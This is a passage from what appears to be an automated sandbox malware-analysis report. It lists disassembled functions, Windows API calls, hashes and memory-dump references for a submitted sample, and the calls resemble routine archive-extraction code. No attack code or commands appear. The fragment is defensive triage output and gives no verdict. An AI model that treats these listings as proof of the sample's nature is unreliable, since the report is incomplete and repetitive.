API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 851c9ffacf1ecb8d97d6f545f0260bcdfcc7a9e3dbca680590db3e301d2773b0
Instruction ID: ef55ea633fc8179142b3defe986594b4b3a5bd5367f59c3917a1b1513ff32282
Opcode Fuzzy Hash: 851c9ffacf1ecb8d97d6f545f0260bcdfcc7a9e3dbca680590db3e301d2773b0
Instruction Fuzzy Hash: 1CB012D526D20D7C324C31086E02D76022FC1C4B11730862EB305E008197847C8A5035

Function 006FDAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDAB2

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5f26421d4df1828d0f4cd48f7293b8e8e254eef631402ea355266ee36c0de7bd
Instruction ID: f5ea45ed5c82187e011b47e2e4d69dbe6e4ee3eb96412db060c3ddf0d508c209
Opcode Fuzzy Hash: 5f26421d4df1828d0f4cd48f7293b8e8e254eef631402ea355266ee36c0de7bd
Instruction Fuzzy Hash: F5A002D526D106BC314C7155BD16D7A025FC4C4B51330851EB54694085654468465435

Function 006FDAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDAB2

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 30fc949660405bbaf52ebf048ffbd6f354427e7abae6efab6e27605557e9b492
Instruction ID: f5ea45ed5c82187e011b47e2e4d69dbe6e4ee3eb96412db060c3ddf0d508c209
Opcode Fuzzy Hash: 30fc949660405bbaf52ebf048ffbd6f354427e7abae6efab6e27605557e9b492
Instruction Fuzzy Hash: F5A002D526D106BC314C7155BD16D7A025FC4C4B51330851EB54694085654468465435

Function 006FDAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDAB2

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 80f4f670f892306fdadd6deaa365b4cd3c5a18beed0c256f65ff770fa3448d95
Instruction ID: f5ea45ed5c82187e011b47e2e4d69dbe6e4ee3eb96412db060c3ddf0d508c209
Opcode Fuzzy Hash: 80f4f670f892306fdadd6deaa365b4cd3c5a18beed0c256f65ff770fa3448d95
Instruction Fuzzy Hash: F5A002D526D106BC314C7155BD16D7A025FC4C4B51330851EB54694085654468465435

Function 006FDACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDAB2

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ba87f034940363ed4f75c685798fb39c228417dfec812e7b5397e1a492e5f8e6
Instruction ID: f5ea45ed5c82187e011b47e2e4d69dbe6e4ee3eb96412db060c3ddf0d508c209
Opcode Fuzzy Hash: ba87f034940363ed4f75c685798fb39c228417dfec812e7b5397e1a492e5f8e6
Instruction Fuzzy Hash: F5A002D526D106BC314C7155BD16D7A025FC4C4B51330851EB54694085654468465435

Function 006FDAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDAB2

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6bf45b4b39d1b3a030a24542696be438f3bc991b7c5c4efa80db0410484b8955
Instruction ID: f5ea45ed5c82187e011b47e2e4d69dbe6e4ee3eb96412db060c3ddf0d508c209
Opcode Fuzzy Hash: 6bf45b4b39d1b3a030a24542696be438f3bc991b7c5c4efa80db0410484b8955
Instruction Fuzzy Hash: F5A002D526D106BC314C7155BD16D7A025FC4C4B51330851EB54694085654468465435

Function 006FDAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDAB2

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 03ac53f40d90954fe4aeae400f86330f45dc8b1e25d48d4a111f91e5a6538eba
Instruction ID: 3b6deb56d91a333a58d9cd19d4d0e468a0b6ffd4f2eb8e4b0fb9ccc7d53c32ca
Opcode Fuzzy Hash: 03ac53f40d90954fe4aeae400f86330f45dc8b1e25d48d4a111f91e5a6538eba
Instruction Fuzzy Hash: E0A002D536D5057C314C7155FD16D7A025FD4D0B11330851EB546A4085654468465435

Function 006FDBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDBD5

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 531d082f22397e442d2107f05717acda273119122b06094ca5303a50aefc13f7
Instruction ID: 2995db001e0f1ccbf73525c14b7505b1a1275573b2fb08cd9717934f7e2cb549
Opcode Fuzzy Hash: 531d082f22397e442d2107f05717acda273119122b06094ca5303a50aefc13f7
Instruction Fuzzy Hash: DEA001EA3AE10ABC324866696D1BEBA032FD4C4B61731891EB60AD5081AA946C8A5435

Function 006FDC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDC36

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d3ec41841da37d5bb2cb7135aee99af43a2258ff6c69e8685e0a2438ca4417c1
Instruction ID: ec48ccd6098db6f6318cd9a6a78b35c02deb3f9b77e71cb5597dd2e8dce168d7
Opcode Fuzzy Hash: d3ec41841da37d5bb2cb7135aee99af43a2258ff6c69e8685e0a2438ca4417c1
Instruction Fuzzy Hash: 92A002D556D1067C314C61556D16D76021FC4C4B55730991DB6069409156857C495435

Function 006FDC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDC36

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b35d78e4ba0c685c2d02aaa9ee43ad3848507959ec2ecd7fee1b1953fb375ada
Instruction ID: ec48ccd6098db6f6318cd9a6a78b35c02deb3f9b77e71cb5597dd2e8dce168d7
Opcode Fuzzy Hash: b35d78e4ba0c685c2d02aaa9ee43ad3848507959ec2ecd7fee1b1953fb375ada
Instruction Fuzzy Hash: 92A002D556D1067C314C61556D16D76021FC4C4B55730991DB6069409156857C495435

Function 006FDC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDBD5

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ec1f5934436506112f03dfc320109fc65fc5ffcba1e58d310671680e7644d45a
Instruction ID: 2995db001e0f1ccbf73525c14b7505b1a1275573b2fb08cd9717934f7e2cb549
Opcode Fuzzy Hash: ec1f5934436506112f03dfc320109fc65fc5ffcba1e58d310671680e7644d45a
Instruction Fuzzy Hash: DEA001EA3AE10ABC324866696D1BEBA032FD4C4B61731891EB60AD5081AA946C8A5435

Function 006FDC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDBD5

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 516bfbcf4a0ac2448d1b5cab96328eab863b8b92d9f45eef1f0ca8ad1c200e24
Instruction ID: 2995db001e0f1ccbf73525c14b7505b1a1275573b2fb08cd9717934f7e2cb549
Opcode Fuzzy Hash: 516bfbcf4a0ac2448d1b5cab96328eab863b8b92d9f45eef1f0ca8ad1c200e24
Instruction Fuzzy Hash: DEA001EA3AE10ABC324866696D1BEBA032FD4C4B61731891EB60AD5081AA946C8A5435

Function 006FDC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDBD5

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e6efc209371a2bde334d84c8571f680088e816b26ab2688666eeddc00a01ffb8
Instruction ID: 2995db001e0f1ccbf73525c14b7505b1a1275573b2fb08cd9717934f7e2cb549
Opcode Fuzzy Hash: e6efc209371a2bde334d84c8571f680088e816b26ab2688666eeddc00a01ffb8
Instruction Fuzzy Hash: DEA001EA3AE10ABC324866696D1BEBA032FD4C4B61731891EB60AD5081AA946C8A5435

Function 006E9EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,006E9104,?,?,-00001964), ref: 006E9EC2

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: d7f805db436af504358d817f7d73fec2bd83a529360d587752d162937a167bc0
Instruction ID: 6c4be6de2584a0c87b678d1d38b23922ddbb9d57f27699e4f8da28988036ad97
Opcode Fuzzy Hash: d7f805db436af504358d817f7d73fec2bd83a529360d587752d162937a167bc0
Instruction Fuzzy Hash: DEB011300A000A8A8E002B38CC088283AA2EB2230A300C2A0A002CA0A0CB22C002AA00

Function 006FA322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,006FA587,C:\Users\user\Desktop,00000000,0072946A,00000006), ref: 006FA326

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 859a21e079e09c3ede3b9e6cc6ad87426b327f36f6750a28f60565e11c4d457b
Instruction ID: 27654deb78a372c05fb13a54a30b6e0abdfc3cda287098109e307988f6f4e641
Opcode Fuzzy Hash: 859a21e079e09c3ede3b9e6cc6ad87426b327f36f6750a28f60565e11c4d457b
Instruction Fuzzy Hash: 3FA0123019400A668A000B34CC09C157A505760702F00C6207002C00E0CB348814B504

Non-executed Functions

Function 006FB8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 006E130B: GetDlgItem.USER32(00000000,00003021), ref: 006E134F
Part of subcall function 006E130B: SetWindowTextW.USER32(00000000,007135B4), ref: 006E1365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 006FB971
EndDialog.USER32(?,00000006), ref: 006FB984
GetDlgItem.USER32(?,0000006C), ref: 006FB9A0
SetFocus.USER32(00000000), ref: 006FB9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 006FB9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 006FBA18
FindFirstFileW.KERNEL32(?,?), ref: 006FBA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006FBA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 006FBA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 006FBA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 006FBA94
_swprintf.LIBCMT ref: 006FBAC4

Part of subcall function 006E400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006E401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 006FBAD7
FindClose.KERNEL32(00000000), ref: 006FBADE
_swprintf.LIBCMT ref: 006FBB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 006FBB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 006FBB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 006FBB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 006FBB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 006FBBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 006FBBC9
_swprintf.LIBCMT ref: 006FBBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 006FBC08
_swprintf.LIBCMT ref: 006FBC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 006FBC6F

Part of subcall function 006FA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 006FA662
Part of subcall function 006FA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0071E600,?,?), ref: 006FA6B1

Strings

%s %s, xrefs: 006FBB29, 006FBC4E
%s %s %s, xrefs: 006FBAB2, 006FBBE7
REPLACEFILEDLG, xrefs: 006FB907

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: feeee5f1335b7bb6dfd4f48399f86e0d8ccd847815d9061984d01e7a6832f79d
Instruction ID: 7719d8a0c965a67b2a1a88b01754d2ab00f9a9d0effc92e042222a00e5b395ec
Opcode Fuzzy Hash: feeee5f1335b7bb6dfd4f48399f86e0d8ccd847815d9061984d01e7a6832f79d
Instruction Fuzzy Hash: CD91C0B224834CBFD3209BA4DC49FFB77ADEB4A700F044819B749D2191DB75AA058B66

Function 006E718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E7191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 006E72F1
CloseHandle.KERNEL32(00000000), ref: 006E7301

Part of subcall function 006E7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 006E7C04
Part of subcall function 006E7BF5: GetLastError.KERNEL32 ref: 006E7C4A
Part of subcall function 006E7BF5: CloseHandle.KERNEL32(?), ref: 006E7C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 006E730C
